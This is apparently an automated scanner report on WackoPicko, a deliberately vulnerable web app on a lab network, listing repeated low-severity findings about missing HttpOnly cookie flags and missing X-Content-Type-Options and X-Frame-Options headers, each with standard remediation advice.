A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531355
Parameter
PHPSESSID
Attack
b61ngeffpbsrebphofvtcfm9j6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617755
Parameter
PHPSESSID
Attack
k197ba37mfe5lvhp4tgn9phjr0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926616
Parameter
PHPSESSID
Attack
qonl4ojkvrqg43g62jrnca9bd3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395013016
Parameter
PHPSESSID
Attack
s39d3eb75c2h9njn0he4p18mi2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099416
Parameter
PHPSESSID
Attack
8mln0d8dmd8heusmaf3i85k6b5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185816
Parameter
PHPSESSID
Attack
2lfiemor34h4vrnb8g8givi7p3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272216
Parameter
PHPSESSID
Attack
2l1uhu0mp36civmd4a6g4fh480; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358616
Parameter
PHPSESSID
Attack
o9814ldp10lnb58c6qguv779e4; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395445016
Parameter
PHPSESSID
Attack
ssh9j73p2ld9iv6cc3ue2fcvi1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531416
Parameter
PHPSESSID
Attack
6igta2os37mua6bb7sb7aed9c0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617816
Parameter
PHPSESSID
Attack
ro2nqfa7k1rslovsu8gjlgl836; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/users/similar.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/users/similar.php

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=14

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=14

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/upload/flowers/flweofoee

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/upload/flowers/flweofoee

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=15

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=15

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/upload/house/hodjjgld

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/upload/house/hodjjgld

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=11

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=11

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/upload/flowers/flowers

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/upload/flowers/flowers

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true